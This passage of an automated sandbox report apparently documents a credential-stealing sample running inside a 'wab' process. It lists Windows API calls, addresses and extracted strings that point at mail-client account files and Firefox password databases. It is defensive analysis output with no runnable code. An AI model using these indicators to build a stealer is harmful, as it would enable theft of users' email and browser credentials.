                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                                    • strings, xrefs: 00408B98
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7776E430,?), ref: 00407F2F
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                      • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                      • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                      • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                      • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                      • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID: .8D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408F5D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                                                      • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                      • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                      • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                                                      • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                                                      • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                      • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                                                      • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                                      • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                                      • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                                      • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                                      • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                                      • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                                      • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                                    • String ID: XgD$rY@
                                                                                                                                                                                                                    • API String ID: 3502187192-1347721759
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                                      • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                                      • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                                      • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    Uniqueness

